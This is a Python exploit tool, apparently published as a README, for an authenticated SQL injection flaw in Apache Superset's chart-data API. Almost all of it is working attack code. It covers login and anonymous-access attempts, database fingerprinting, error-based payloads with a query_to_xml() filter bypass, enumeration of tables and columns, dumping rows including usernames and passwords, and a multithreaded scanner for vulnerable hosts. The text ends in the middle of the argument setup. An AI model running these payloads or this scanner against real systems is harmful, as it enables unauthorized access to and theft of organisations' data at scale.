README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2026-23980 -- Apache Superset Authenticated Error-Based SQL Injection
=========================================================================
Apache Superset < 6.0.0 allows authenticated users with read access to
perform error-based SQL injection via the 'sqlExpression' or 'where'
parameters in the /api/v1/chart/data endpoint.
Kill chain:
POST /api/v1/chart/data
-> ChartDataRestApi.data() -> QueryContext.get_df_payload()
-> SqlaTable.get_sqla_query() -> adhoc column sqlExpression
-> validate_adhoc_subquery() BYPASSED via query_to_xml()
-> raw SQL hits the database -> data extraction
For AUTHORIZED SECURITY RESEARCH ONLY.
CVSS 6.5 | CWE-89 | Fixed in Apache Superset 6.0.0
"""
from __future__ import annotations
import argparse
import json
import sys
import textwrap
import time
import random
import re
import threading
from concurrent.futures import ThreadPoolExecutor, as_completed
try:
import requests
from requests.exceptions import ConnectionError, Timeout
except ImportError:
print("[!] 'requests' library required: pip install requests")
sys.exit(1)
# -- Globals -----------------------------------------------------------------
VERBOSITY = 1
# -- ANSI --------------------------------------------------------------------
class C:
RED = "\033[91m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
CYAN = "\033[96m"
MAGENTA = "\033[95m"
WHITE = "\033[97m"
GRAY = "\033[90m"
BOLD = "\033[1m"
DIM = "\033[2m"
BLINK = "\033[5m"
RESET = "\033[0m"
# -- Output helpers ----------------------------------------------------------
_glitch_chars = list("\u2591\u2592\u2593\u2588\u2580\u2584\u258c\u2590")
_print_lock = threading.Lock()
def _glitch(n: int = 12) -> str:
return "".join(random.choice(_glitch_chars) for _ in range(n))
def _typewriter(text: str, speed: float = 0.02):
for ch in text:
sys.stdout.write(ch)
sys.stdout.flush()
time.sleep(speed)
print()
def info(msg):
if VERBOSITY >= 1:
print(f" {C.CYAN}[*]{C.RESET} {msg}")
def good(msg):
print(f" {C.GREEN}[+]{C.RESET} {msg}")
def warn(msg):
print(f" {C.YELLOW}[!]{C.RESET} {msg}")
def fail(msg):
print(f" {C.RED}{C.BOLD}[-]{C.RESET} {msg}")
def creepy(msg):
if VERBOSITY >= 1:
print(f" {C.MAGENTA}[~]{C.RESET} {C.MAGENTA}{msg}{C.RESET}")
def debug(msg):
if VERBOSITY >= 2:
print(f" {C.GRAY}[DEBUG]{C.RESET} {C.DIM}{msg}{C.RESET}")
def print_table(headers: list[str], rows: list[list[str]], title: str = ""):
"""Print a sqlmap-style ASCII table."""
if not rows:
return
col_widths = [len(h) for h in headers]
for row in rows:
for i, cell in enumerate(row):
if i < len(col_widths):
col_widths[i] = max(col_widths[i], len(str(cell)))
sep = "+-" + "-+-".join("-" * w for w in col_widths) + "-+"
hdr = "| " + " | ".join(h.ljust(w) for h, w in zip(headers, col_widths)) + " |"
if title:
print(f"\n {C.WHITE}{C.BOLD}{title}{C.RESET}")
print(f" {sep}")
print(f" {C.BOLD}{hdr}{C.RESET}")
print(f" {sep}")
for row in rows:
cells = []
for i, w in enumerate(col_widths):
val = str(row[i]) if i < len(row) else ""
cells.append(val.ljust(w))
print(f" | {' | '.join(cells)} |")
print(f" {sep}")
print(f" {C.DIM}[{len(rows)} row(s)]{C.RESET}")
# -- Session management ------------------------------------------------------
def login(base_url: str, username: str, password: str,
timeout: int = 15) -> requests.Session | None:
session = requests.Session()
try:
r = session.post(
f"{base_url}/api/v1/security/login",
json={"username": username, "password": password,
"provider": "db", "refresh": True},
timeout=timeout,
)
if r.status_code != 200:
fail(f"login failed: HTTP {r.status_code}")
return None
token = r.json().get("access_token")
if not token:
fail("no access_token in response")
return None
session.headers.update({"Authorization": f"Bearer {token}"})
except Exception as e:
fail(f"login error: {e}")
return None
try:
r = session.get(f"{base_url}/api/v1/security/csrf_token/", timeout=timeout)
if r.status_code == 200:
csrf = r.json().get("result")
if csrf:
session.headers.update({"X-CSRFToken": csrf})
except Exception:
pass
return session
def try_anonymous(base_url: str, timeout: int = 15) -> requests.Session | None:
"""Try to access Superset without authentication.
Works when PUBLIC_ROLE_LIKE is set (e.g. "Gamma"), giving anonymous
users read access to datasets and the chart/data endpoint.
Also tries to grab a CSRF token from the login page cookies, which
some Superset configs expose to anonymous users.
"""
session = requests.Session()
# Step 1: Hit the main page to pick up any session cookies
try:
r = session.get(base_url, timeout=timeout)
except Exception:
pass
# Step 2: Try to get a CSRF token (some configs expose this anonymously)
try:
r = session.get(f"{base_url}/api/v1/security/csrf_token/", timeout=timeout)
if r.status_code == 200:
csrf = r.json().get("result")
if csrf:
session.headers.update({"X-CSRFToken": csrf})
debug(f"got anonymous CSRF token")
except Exception:
pass
# Step 3: Test if we can actually hit the chart/data endpoint
# Try a minimal request to see if we get 401/403 or something else
test_body = {
"datasource": {"id": 1, "type": "table"},
"queries": [{
"columns": [{"label": "test", "sqlExpression": "1",
"expressionType": "SQL"}],
"metrics": [], "filters": [],
"extras": {"having": "", "where": ""},
"row_limit": 1, "time_range": "No filter",
}],
"result_format": "json", "result_type": "full",
}
try:
r = session.post(f"{base_url}/api/v1/chart/data",
json=test_body, timeout=timeout)
if r.status_code in (200, 400, 422, 500):
# Got past auth — public role is active
return session
elif r.status_code in (401, 403):
return None
except Exception:
pass
return None
def check_version(base_url: str, timeout: int = 10) -> str | None:
for endpoint in ["/api/v1/version", "/health"]:
try:
r = requests.get(f"{base_url}{endpoint}", timeout=timeout)
if r.status_code == 200:
data = r.json()
v = data.get("result", {}).get("version") or data.get("version")
if v:
return v
except Exception:
pass
return None
def is_vulnerable(version: str) -> bool:
try:
parts = [int(x) for x in version.strip().split(".")[:3]]
return parts[0] < 6
except ValueError:
return False
def enumerate_datasources(base_url: str, session: requests.Session,
timeout: int = 15) -> list[dict]:
datasources = []
try:
r = session.get(f"{base_url}/api/v1/dataset/",
params={"q": "(page_size:50)"}, timeout=timeout)
if r.status_code == 200:
for ds in r.json().get("result", []):
datasources.append({
"id": ds.get("id"),
"name": ds.get("table_name") or ds.get("datasource_name"),
"schema": ds.get("schema"),
"database": ds.get("database", {}).get("database_name", "?"),
"type": ds.get("datasource_type", "table"),
})
except Exception:
pass
return datasources
# -- SQL Injection core -------------------------------------------------------
def build_chart_data_payload(datasource_id: int, datasource_type: str = "table",
injection_point: str = "sqlExpression",
sqli_payload: str = "1") -> dict:
if injection_point == "sqlExpression":
return {
"datasource": {"id": datasource_id, "type": datasource_type},
"queries": [{
"columns": [{
"label": "injected",
"sqlExpression": sqli_payload,
"expressionType": "SQL",
}],
"metrics": [], "filters": [],
"extras": {"having": "", "where": ""},
"row_limit": 1000, "order_desc": True,
"time_range": "No filter",
}],
"result_format": "json", "result_type": "full",
}
else:
return {
"datasource": {"id": datasource_id, "type": datasource_type},
"queries": [{
"columns": [],
"metrics": [{"label": "cnt", "expressionType": "SQL",
"sqlExpression": "COUNT(*)"}],
"filters": [],
"extras": {"having": "", "where": sqli_payload},
"row_limit": 1, "order_desc": True,
"time_range": "No filter",
}],
"result_format": "json", "result_type": "full",
}
def send_sqli(base_url: str, session: requests.Session, datasource_id: int,
sqli_payload: str, injection_point: str = "sqlExpression",
datasource_type: str = "table",
timeout: int = 30) -> tuple[int, str]:
body = build_chart_data_payload(datasource_id, datasource_type,
injection_point, sqli_payload)
debug(f"SQL payload: {sqli_payload}")
try:
r = session.post(f"{base_url}/api/v1/chart/data", json=body, timeout=timeout)
if VERBOSITY >= 3:
debug(f"HTTP {r.status_code}: {r.text[:300]}")
return r.status_code, r.text
except Exception as e:
return 0, str(e)
def extract_from_direct(response_text: str) -> list[dict] | None:
"""Parse all rows from a successful JSON response."""
try:
data = json.loads(response_text)
results = data.get("result", [])
if results and results[0].get("data"):
return results[0]["data"]
except Exception:
pass
return None
def extract_single_from_direct(response_text: str) -> str | None:
"""Extract a single value from direct response."""
rows = extract_from_direct(response_text)
if rows:
row = rows[0]
val = row.get("injected")
if val is not None:
return str(val)
return None
def extract_from_error(response_text: str) -> str | None:
patterns = [
r'invalid input syntax for (?:type )?integer: "([^"]*)"',
r'"message":\s*".*?invalid input syntax.*?\\"([^\\]*)\\"',
]
for pat in patterns:
m = re.search(pat, response_text)
if m:
return m.group(1)
return None
def sqli_extract_string(sql_expr: str) -> str:
return f"CAST(({sql_expr}) AS INT)"
def sqli_xml_bypass(sql_query: str) -> str:
return f"query_to_xml('{sql_query}', true, false, '')"
def extract_value(base_url, session, ds_id, sql, inj_point="sqlExpression",
xml_bypass=False, timeout=30) -> str | None:
"""Extract a single value. Tries direct, then error-based."""
# Direct
if inj_point == "sqlExpression":
status, text = send_sqli(base_url, session, ds_id, f"({sql})",
injection_point=inj_point, timeout=timeout)
result = extract_single_from_direct(text)
if result:
return result
# Error-based
if xml_bypass:
inner = sqli_xml_bypass(sql.replace("'", "''"))
payload = f"CAST(({inner})::text AS INT)"
else:
payload = sqli_extract_string(sql)
if inj_point == "where":
payload = f"1=1 AND {payload} > 0"
status, text = send_sqli(base_url, session, ds_id, payload,
injection_point=inj_point, timeout=timeout)
return extract_from_error(text)
def extract_rows(base_url, session, ds_id, sql, inj_point="sqlExpression",
xml_bypass=False, timeout=30,
start=0, stop=100) -> list[str]:
"""Extract multiple rows using LIMIT/OFFSET."""
results = []
base_sql = re.sub(r'\s+LIMIT\s+\d+', '', sql, flags=re.I)
base_sql = re.sub(r'\s+OFFSET\s+\d+', '', base_sql, flags=re.I)
for offset in range(start, stop):
query = f"{base_sql} LIMIT 1 OFFSET {offset}"
val = extract_value(base_url, session, ds_id, query,
inj_point=inj_point, xml_bypass=xml_bypass,
timeout=timeout)
if val is None:
break
results.append(val)
if VERBOSITY >= 1:
sys.stdout.write(f"\r {C.CYAN}[*]{C.RESET} extracting... "
f"{C.BOLD}{len(results)}{C.RESET} row(s)")
sys.stdout.flush()
if results and VERBOSITY >= 1:
print()
return results
def extract_multi_column_direct(base_url, session, ds_id, columns: list[str],
inj_point="sqlExpression", timeout=30,
start=0, stop=20) -> list[list[str]]:
"""Extract multi-column data using direct sqlExpression reads.
Instead of SELECT col FROM table (blocked by subquery filter),
we inject the column name directly as the sqlExpression. This reads
from the datasource's underlying table without a FROM clause.
We use row_limit and offset via multiple requests.
"""
# Build payload with all columns at once
body = {
"datasource": {"id": ds_id, "type": "table"},
"queries": [{
"columns": [
{"label": col, "sqlExpression": col, "expressionType": "SQL"}
for col in columns
],
"metrics": [], "filters": [],
"extras": {"having": "", "where": ""},
"row_limit": stop - start,
"row_offset": start,
"order_desc": False,
"time_range": "No filter",
}],
"result_format": "json", "result_type": "full",
}
try:
r = session.post(f"{base_url}/api/v1/chart/data", json=body, timeout=timeout)
if r.status_code == 200:
data = r.json().get("result", [{}])[0].get("data", [])
rows = []
for row in data:
rows.append([str(row.get(col, "NULL")) for col in columns])
return rows
except Exception:
pass
return []
def extract_multi_column_rows(base_url, session, ds_id, columns: list[str],
table: str, inj_point="sqlExpression",
xml_bypass=False, timeout=30,
start=0, stop=20, where="") -> list[list[str]]:
"""Extract multiple columns per row. Tries direct read first, then subquery."""
# Strategy 1: Direct column read (works when ds_id matches the table)
if inj_point == "sqlExpression" and not xml_bypass:
rows = extract_multi_column_direct(base_url, session, ds_id, columns,
inj_point=inj_point, timeout=timeout,
start=start, stop=stop)
if rows:
if VERBOSITY >= 1:
print(f" {C.CYAN}[*]{C.RESET} extracted {C.BOLD}{len(rows)}{C.RESET} row(s) via direct read")
return rows
# Strategy 2: Subquery per column (works with xml_bypass on PostgreSQL)
rows = []
where_clause = f" WHERE {where}" if where else ""
for offset in range(start, stop):
row_data = []
empty = True
for col in columns:
sql = f"SELECT {col} FROM {table}{where_clause} LIMIT 1 OFFSET {offset}"
val = extract_value(base_url, session, ds_id, sql,
inj_point=inj_point, xml_bypass=xml_bypass,
timeout=timeout)
if val is not None:
empty = False
row_data.append(val or "NULL")
if empty:
break
rows.append(row_data)
if VERBOSITY >= 1:
sys.stdout.write(f"\r {C.CYAN}[*]{C.RESET} dumping... "
f"{C.BOLD}{len(rows)}{C.RESET} row(s)")
sys.stdout.flush()
if rows and VERBOSITY >= 1:
print()
return rows
# -- DB Fingerprinting -------------------------------------------------------
def fingerprint_db(base_url, session, ds_id, inj_point="sqlExpression",
timeout=30) -> str:
"""Detect backend database type. Returns 'sqlite', 'postgresql', or 'unknown'."""
info("fingerprinting backend database...")
# Try SQLite — sqlite_version() is a scalar function (no FROM)
status, text = send_sqli(base_url, session, ds_id, "(SELECT sqlite_version())",
injection_point=inj_point, timeout=timeout)
val = extract_single_from_direct(text)
if val and re.match(r'\d+\.\d+', val):
good(f"backend: {C.BOLD}SQLite {val}{C.RESET}")
return "sqlite"
# Try PostgreSQL — current_setting() is a scalar function (no FROM)
status, text = send_sqli(base_url, session, ds_id,
"(SELECT current_setting('server_version'))",
injection_point=inj_point, timeout=timeout)
val = extract_single_from_direct(text)
if val and re.match(r'\d+\.\d+', val):
good(f"backend: {C.BOLD}PostgreSQL {val}{C.RESET}")
return "postgresql"
# Try MySQL — @@version is a system variable (no FROM)
status, text = send_sqli(base_url, session, ds_id, "(SELECT @@version)",
injection_point=inj_point, timeout=timeout)
val = extract_single_from_direct(text)
if val:
good(f"backend: {C.BOLD}MySQL {val}{C.RESET}")
return "mysql"
warn("could not fingerprint backend database")
return "unknown"
# -- Enumeration functions (sqlmap-style) ------------------------------------
def enum_banner(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout):
info("fetching banner...")
queries = {
"sqlite": "SELECT sqlite_version()",
"postgresql": "SELECT current_setting('server_version')",
"mysql": "SELECT @@version",
"unknown": "SELECT sqlite_version()",
}
val = extract_value(base_url, session, ds_id, queries.get(db_type, queries["unknown"]),
inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout)
if val:
good(f"banner: {C.BOLD}{val}{C.RESET}")
else:
fail("could not fetch banner")
def enum_current_user(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout):
info("fetching current user...")
queries = {
"sqlite": "SELECT 'sqlite_user'",
"postgresql": "SELECT current_user",
"mysql": "SELECT user()",
}
val = extract_value(base_url, session, ds_id,
queries.get(db_type, "SELECT current_user"),
inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout)
if val:
good(f"current user: {C.BOLD}{val}{C.RESET}")
else:
fail("could not fetch current user")
def enum_current_db(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout):
info("fetching current database...")
queries = {
"sqlite": "SELECT 'main'",
"postgresql": "SELECT current_database()",
"mysql": "SELECT database()",
}
val = extract_value(base_url, session, ds_id,
queries.get(db_type, "SELECT current_database()"),
inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout)
if val:
good(f"current database: {C.BOLD}{val}{C.RESET}")
else:
fail("could not fetch current database")
def enum_hostname(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout):
info("fetching hostname...")
queries = {
"sqlite": "SELECT 'N/A (SQLite)'",
"postgresql": "SELECT inet_server_addr()",
"mysql": "SELECT @@hostname",
}
val = extract_value(base_url, session, ds_id,
queries.get(db_type, "SELECT 'unknown'"),
inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout)
if val:
good(f"hostname: {C.BOLD}{val}{C.RESET}")
else:
fail("could not fetch hostname")
def enum_dbs(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout):
info("enumerating databases...")
queries = {
"sqlite": "SELECT name FROM pragma_database_list",
"postgresql": "SELECT datname FROM pg_database WHERE datistemplate = false",
"mysql": "SELECT schema_name FROM information_schema.schemata",
}
sql = queries.get(db_type, queries["postgresql"])
rows = extract_rows(base_url, session, ds_id, sql,
inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout)
if rows:
good(f"available databases [{len(rows)}]:")
print_table(["database"], [[r] for r in rows])
else:
# Fallback: list databases from Superset API
warn("subquery blocked -- listing databases from Superset API")
try:
r = session.get(f"{base_url.rstrip('/')}/api/v1/database/", timeout=timeout)
if r.status_code == 200:
dbs = r.json().get("result", [])
if dbs:
db_names = [d.get("database_name", "?") for d in dbs]
good(f"available databases [{len(db_names)}] (via API):")
print_table(["database"], [[n] for n in db_names])
return
except Exception:
pass
fail("could not enumerate databases")
def enum_tables(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout,
target_db=None, datasources=None):
db_label = target_db or "current"
info(f"enumerating tables in '{db_label}'...")
if db_type == "sqlite":
sql = "SELECT name FROM sqlite_master WHERE type='table'"
elif db_type == "postgresql":
schema = target_db or "public"
sql = (f"SELECT table_name FROM information_schema.tables "
f"WHERE table_schema='{schema}'")
elif db_type == "mysql":
if target_db:
sql = (f"SELECT table_name FROM information_schema.tables "
f"WHERE table_schema='{target_db}'")
else:
sql = ("SELECT table_name FROM information_schema.tables "
"WHERE table_schema=database()")
else:
sql = "SELECT name FROM sqlite_master WHERE type='table'"
rows = extract_rows(base_url, session, ds_id, sql,
inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout)
if rows:
good(f"tables in '{db_label}' [{len(rows)}]:")
print_table(["table_name"], [[r] for r in rows])
else:
# Fallback: if subquery blocked, list known datasources as tables
if datasources:
warn("subquery filter blocked FROM clause -- listing known datasources instead")
warn("use --xml-bypass on PostgreSQL to bypass this filter")
rows = [ds["name"] for ds in datasources if ds["name"]]
if rows:
good(f"known datasource tables [{len(rows)}]:")
print_table(["table_name"], [[r] for r in rows])
else:
fail("could not enumerate tables (subquery filter active)")
warn("try --xml-bypass on PostgreSQL targets")
return rows
def enum_columns_via_api(base_url, session, target_table, datasources, timeout=15):
"""Fallback: get columns from the Superset dataset API."""
# Find the dataset ID for this table
ds_match = None
for ds in (datasources or []):
if ds.get("name") == target_table:
ds_match = ds
break
if not ds_match:
return []
try:
r = session.get(f"{base_url}/api/v1/dataset/{ds_match['id']}",
timeout=timeout)
if r.status_code == 200:
cols = r.json().get("result", {}).get("columns", [])
return [c.get("column_name") or c.get("name", "?") for c in cols]
except Exception:
pass
return []
def enum_columns(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout,
target_table, target_db=None, datasources=None):
info(f"enumerating columns in '{target_table}'...")
if db_type == "sqlite":
sql = f"SELECT name FROM pragma_table_info('{target_table}')"
elif db_type == "postgresql":
schema = target_db or "public"
sql = (f"SELECT column_name FROM information_schema.columns "
f"WHERE table_schema='{schema}' AND table_name='{target_table}'")
elif db_type == "mysql":
if target_db:
sql = (f"SELECT column_name FROM information_schema.columns "
f"WHERE table_schema='{target_db}' AND table_name='{target_table}'")
else:
sql = (f"SELECT column_name FROM information_schema.columns "
f"WHERE table_schema=database() AND table_name='{target_table}'")
else:
sql = f"SELECT name FROM pragma_table_info('{target_table}')"
rows = extract_rows(base_url, session, ds_id, sql,
inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout)
if rows:
good(f"columns in '{target_table}' [{len(rows)}]:")
print_table(["column_name"], [[r] for r in rows])
else:
# Fallback: get columns from Superset API
warn("subquery blocked -- falling back to Superset dataset API")
api_cols = enum_columns_via_api(base_url, session, target_table,
datasources, timeout)
if api_cols:
rows = api_cols
good(f"columns in '{target_table}' [{len(rows)}] (via API):")
print_table(["column_name"], [[r] for r in rows])
else:
fail(f"could not enumerate columns for '{target_table}'")
return rows
def enum_count(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout,
target_table, target_db=None):
info(f"counting rows in '{target_table}'...")
# COUNT(*) must be sent as a metric, not a column
body = {
"datasource": {"id": ds_id, "type": "table"},
"queries": [{
"columns": [],
"metrics": [{"label": "cnt", "expressionType": "SQL",
"sqlExpression": "COUNT(*)"}],
"filters": [], "extras": {"having": "", "where": ""},
"row_limit": 1, "time_range": "No filter",
}],
"result_format": "json", "result_type": "full",
}
try:
r = session.post(f"{base_url}/api/v1/chart/data", json=body, timeout=timeout)
if r.status_code == 200:
data = r.json().get("result", [{}])[0].get("data", [])
if data:
cnt = data[0].get("cnt")
if cnt is not None:
good(f"rows in '{target_table}': {C.BOLD}{cnt}{C.RESET}")
return
except Exception:
pass
fail("could not count rows")
def enum_dump(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout,
target_table, target_columns=None, target_db=None,
start=0, stop=20, datasources=None):
if target_columns:
columns = [c.strip() for c in target_columns.split(",")]
else:
# Auto-discover columns
cols = enum_columns(base_url, session, ds_id, db_type, inj_point,
xml_bypass, timeout, target_table, target_db,
datasources=datasources)
if not cols:
fail("cannot dump without column names -- specify -C manually")
return
columns = cols[:10]
info(f"dumping '{target_table}' [{', '.join(columns)}] rows {start}-{stop}...")
rows = extract_multi_column_rows(
base_url, session, ds_id, columns, target_table,
inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout,
start=start, stop=stop,
)
if rows:
good(f"dumped {len(rows)} row(s) from '{target_table}':")
print_table(columns, rows, title=f"Table: {target_table}")
else:
fail(f"could not dump '{target_table}'")
def enum_dump_all(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout,
target_db=None, start=0, stop=10, datasources=None):
tables = enum_tables(base_url, session, ds_id, db_type, inj_point,
xml_bypass, timeout, target_db, datasources=datasources)
if not tables:
return
for table_name in tables:
print()
enum_dump(base_url, session, ds_id, db_type, inj_point, xml_bypass,
timeout, table_name, target_db=target_db,
start=start, stop=stop, datasources=datasources)
# -- Injection test ----------------------------------------------------------
def test_injectable(base_url, session, ds_id, timeout=30) -> str | None:
for point in ("sqlExpression", "where"):
if point == "sqlExpression":
payload = "CAST('sqli_test_xyzzy' AS INT)"
else:
payload = "1=1 AND CAST('sqli_test_xyzzy' AS INT) > 0"
status, text = send_sqli(base_url, session, ds_id, payload,
injection_point=point, timeout=timeout)
if "sqli_test_xyzzy" in text:
return point
return None
# -- Bulk scanner ------------------------------------------------------------
def _scan_single(target, timeout, results):
target = target.strip().rstrip("/")
if not target:
return
if not target.startswith("http"):
target = f"http://{target}"
entry = {"url": target, "status": "unknown", "version": None}
try:
version = check_version(target, timeout=timeout)
if version:
entry["version"] = version
entry["status"] = "VULNERABLE" if is_vulnerable(version) else "patched"
else:
try:
r = requests.get(target, timeout=timeout)
entry["status"] = "up (version hidden)" if r.status_code < 500 else "error"
except Exception:
entry["status"] = "down"
with _print_lock:
if entry["status"] == "VULNERABLE":
print(f" {C.RED}[VULN]{C.RESET} {C.BOLD}{target}{C.RESET} -- {entry['version']}")
elif entry["status"] == "patched":
print(f" {C.GREEN}[SAFE]{C.RESET} {target} -- {entry['version']}")
else:
print(f" {C.GRAY}[----]{C.RESET} {target} -- {C.DIM}{entry['status']}{C.RESET}")
except Exception:
entry["status"] = "error"
results[target] = entry
def run_bulk_scan(scan_file, threads=10, timeout=10, output_file=None):
try:
with open(scan_file) as f:
targets = [l.strip() for l in f if l.strip() and not l.strip().startswith("#")]
except FileNotFoundError:
fail(f"file not found: {scan_file}")
sys.exit(1)
print(f"\n {C.RED}{C.BOLD}CVE-2026-23980{C.RESET} -- {C.DIM}Bulk Scanner{C.RESET}")
info(f"loaded {len(targets)} target(s)")
print(f" {C.DIM}{'=' * 50}{C.RESET}")
results = {}
start = time.time()
with ThreadPoolExecutor(max_workers=threads) as pool:
futures = {pool.submit(_scan_single, t, timeout, results): t for t in targets}
for f in as_completed(futures):
try: f.result()
except Exception: pass
elapsed = time.time() - start
vuln = sum(1 for r in results.values() if r["status"] == "VULNERABLE")
print(f" {C.DIM}{'=' * 50}{C.RESET}")
print(f" {C.RED}{C.BOLD}{vuln}{C.RESET} vulnerable / {len(results)} scanned ({elapsed:.1f}s)\n")
if output_file:
with open(output_file, "w") as f:
for r in results.values():
f.write(f"{r['status']}\t{r['url']}\tv={r['version'] or '?'}\n")
good(f"saved to {output_file}")
# -- Banner ------------------------------------------------------------------
_BLOODY_SKULL = [
" \033[91m\033[1m_,.-------.,_\033[0m",
" \033[91m\033[1m,;~'\033[0m\033[31m \033[91m\033[1m'~;,\033[0m",
" \033[91m\033[1m,;\033[0m\033[31m \033[91m\033[1m;,\033[0m",
" \033[91m\033[1m;\033[0m\033[31m \033[91m\033[1m_ ___ _\033[0m\033[31m \033[91m\033[1m;\033[0m",
" \033[91m\033[1m'\033[0m\033[31m \033[97m\033[1m/ \\ \033[0m\033[31m \033[97m\033[1m/ \\ \033[0m\033[31m \033[91m\033[1m'\033[0m",
" \033[91m\033[1m;\033[0m\033[31m \033[97m\033[1m| () |\033[0m\033[31m \033[97m\033[1m| () |\033[0m\033[31m \033[91m\033[1m;\033[0m",
" \033[91m\033[1m;\033[0m\033[31m \033[97m\033[1m\\__/ \033[0m\033[31m \033[97m\033[1m\\__/ \033[0m\033[31m \033[91m\033[1m;\033[0m",
" \033[91m\033[1m;\033[0m\033[31m \033[91m\033[1m/\\\033[0m\033[31m \033[91m\033[1m;\033[0m",
" \033[91m\033[1m;\033[0m\033[31m \033[91m\033[1m\\______/\033[0m\033[31m \033[91m\033[1m;\033[0m",
" \033[91m\033[1m';\033[0m\033[31m \033[91m\033[1m|\"\"\"\"\"\"|\033[0m\033[31m \033[91m\033[1m;'\033[0m",
" \033[91m\033[1m';\033[0m\033[31m \033[91m\033[1m| |\033[0m\033[31m \033[91m\033[1m;'\033[0m",
" \033[91m\033[1m'------'\033[0m",
]
def banner():
print()
for line in _BLOODY_SKULL:
print(f" {line}")
time.sleep(0.04)
print(f"""{C.RED}{C.BOLD}
\u2554{'=' * 59}\u2557
\u2551 {C.BLINK}CVE-2026-23980{C.RESET}{C.RED}{C.BOLD} -- Apache Superset SQLi \u2551
\u2551 {C.RESET}{C.DIM}CVSS 6.5 | CWE-89 | Superset < 6.0.0{C.RESET}{C.RED}{C.BOLD} \u2551
\u255a{'=' * 59}\u255d{C.RESET}""")
_typewriter(
f" {C.GRAY}// their queries bleed data. "
f"sqlExpression was the wound.{C.RESET}",
speed=0.015,
)
print()
# -- Main --------------------------------------------------------------------
def main():
global VERBOSITY
desc = f"""
{C.RED}{C.BOLD}CVE-2026-23980{C.RESET} -- Apache Superset Authenticated SQL Injection
{C.DIM}sqlmap-style enumeration via sqlExpression / where injection{C.RESET}
{C.GRAY}CVSS 6.5 | CWE-89 | Apache Superset < 6.0.0{C.RESET}
{C.WHITE}{C.BOLD}KILL CHAIN:{C.RESET}
{C.DIM}POST /api/v1/chart/data -> sqlExpression -> exec() on DB{C.RESET}
"""
epilog = f"""
{C.WHITE}{C.BOLD}EXAMPLES:{C.RESET}
{C.CYAN}Recon:{C.RESET}
%(prog)s -u http://target:8088 --check
{C.CYAN}Enumerate:{C.RESET}
%(prog)s -u http://target:8088 --banner --current-user --current-db
%(prog)s -u http://target:8088 --dbs
%(prog)s -u http://target:8088 --tables
%(prog)s -u http://target:8088 --tables -D public
%(prog)s -u http://target:8088 --columns -T users
%(prog)s -u http://target:8088 --count -T users
{C.CYAN}Dump:{C.RESET}
%(prog)s -u http://target:8088 --dump -T users
%(prog)s -u http://target:8088 --dump -T users -C "username,password" --start 0 --stop 50
%(prog)s -u http://target:8088 --dump-all --stop 5
{C.CYAN}Raw SQL:{C.RESET}
%(prog)s -u http://target:8088 --sql "SELECT version()"
{C.CYAN}No creds:{C.RESET}
%(prog)s -u http://target:8088 --anonymous --banner --tables
{C.CYAN}Bypass + Bulk:{C.RESET}
%(prog)s -u http://target:8088 --tables --xml-bypass
%(prog)s --scan-file targets.txt --threads 20
{C.DIM}// authorized security research only.{C.RESET}
"""
P = argparse.ArgumentParser(description=desc, epilog=epilog,
formatter_class=argparse.RawDescriptionHelpFormatter)
g = P.add_argument_group(f"{C.RED}TARGET{C.RESET}",
f"{C.DIM}who forgot to parameterize today?{C.RESET}")
g.add_argument("-u", "--url", help="Superset URL (http://target:8088)")
g.add_argument("--user", default="admin", help="username (default: admin)")
g.add_argument("--password", default="admin", help="password (default: admin)")
g.add_argument("--anonymous", action="store_true",
help="skip login -- exploit via PUBLIC_ROLE (no creds needed)")
g.add_argument("--ds-id", type=int, help="datasource/dataset ID")
g = P.add_argument_group(f"{C.RED}ENUMERATE{C.RESET}",
f"{C.DIM}sqlmap-style automated extraction{C.RESET}")
g.add_argument("--banner", action="store_true", help="DB version banner")
g.add_argument("--current-user", action="store_true", help="current DB user")
g.add_argument("--current-db", action="store_true", help="current database")
g.add_argument("--hostname", action="store_true", help="server hostname")
g.add_argument("--dbs", action="store_true", help="list databases")
g.add_argument("--tables", action="store_true", help="list tables")
g.add_argument("--columns", action="store_true", help="list columns (requires -T)")
g.add_argument("--dump", action="store_true", help="dump table (requires -T)")
g.add_argument("--dump-all", action="store_true", help="dump all tables")
g.add_argument("--count", action="store_true", help="count table rows (requires -T)")
g = P.add_argument_group(f"{C.RED}SPECIFY{C.RESET}",
f"{C.DIM}narrow down the target{C.RESET}")
g.add_argument("-D", dest="target_db", help="target database/schema")
g.add_argument("-T", dest="target_table", help="target table")
g.add_argument("-C", dest="target_columns", help="target columns (comma-sep)")
g.add_argument("--start", type=int, default=0, help="start row (default: 0)")
g.add_argument("--stop", type=int, default=20, help="stop row (default: 20)")
g = P.add_argument_group(f"{C.RED}INJECTION{C.RESET}",
f"{C.DIM}manual control over the injection{C.RESET}")
g.add_argument("--check", action="store_true", help="recon only")
g.add_argument("--test", action="store_true", help="test if injectable")
g.add_argument("--sql", help="raw SQL query to extract")
g.add_argument("--injection-point", choices=["sqlExpression", "where"],
default="sqlExpression", help="injection vector (default: sqlExpression)")
g.add_argument("--xml-bypass", action="store_true",
help="bypass subquery filter via query_to_xml()")
g = P.add_argument_group(f"{C.RED}SCAN{C.RESET}")
g.add_argument("--scan-file", help="bulk scan targets (one URL/line)")
g.add_argument("--threads", type=int, default=10, help="scan threads (default: 10)")
g.add_argument("--scan-output", help="save scan results")
g = P.add_argument_group(f"{C.RED}GENERAL{C.RESET}")
g.add_argument("-v", type=int, default=1, help="verbosity 0-3 (default: 1)")
g.add_argument("--proxy", help="HTTP proxy (http://127.0.0.1:8080)")
g.add_argument("--timeout", type=int, default=30, help="timeout (default: 30)")
g.add_argument("--batch", action="store_true", help="non-interactive mode")
